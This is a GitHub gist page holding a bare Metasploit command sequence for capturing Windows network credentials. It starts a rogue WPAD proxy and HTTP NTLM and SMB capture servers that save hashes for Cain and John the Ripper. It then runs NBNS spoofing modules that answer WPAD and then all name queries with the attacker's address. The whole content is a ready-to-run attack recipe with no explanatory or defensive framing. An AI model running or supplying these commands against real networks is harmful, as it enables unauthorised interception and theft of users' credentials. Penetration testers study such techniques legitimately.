Skip to content

Instantly share code, notes, and snippets.

@ddouhine
Created July 24, 2015 09:07
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ddouhine/aaba29eb0ee0077c2c96 to your computer and use it in GitHub Desktop.
Save ddouhine/aaba29eb0ee0077c2c96 to your computer and use it in GitHub Desktop.
use auxiliary/server/wpad
set PROXY x.x.x.x
run
use auxiliary/server/capture/http_ntlm
set CAINPWFILE /root/cain.http.pw
set JOHNPWFILE /root/john.http.pw
set URIPATH /
set SRVPORT 80
run
use auxiliary/server/capture/smb
set CAINPWFILE /root/cain.smb.pw
set JOHNPWFILE /root/john.smb.pw
run
use auxiliary/spoof/nbns/nbns_response
set GATEWAY_PROBE_HOST x.x.x.1
set SPOOFIP x.x.x.x
set REGEX WPAD.*
run
use auxiliary/spoof/nbns/nbns_response
set GATEWAY_PROBE_HOST x.x.x.1
set SPOOFIP x.x.x.x
set REGEX .*
run
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment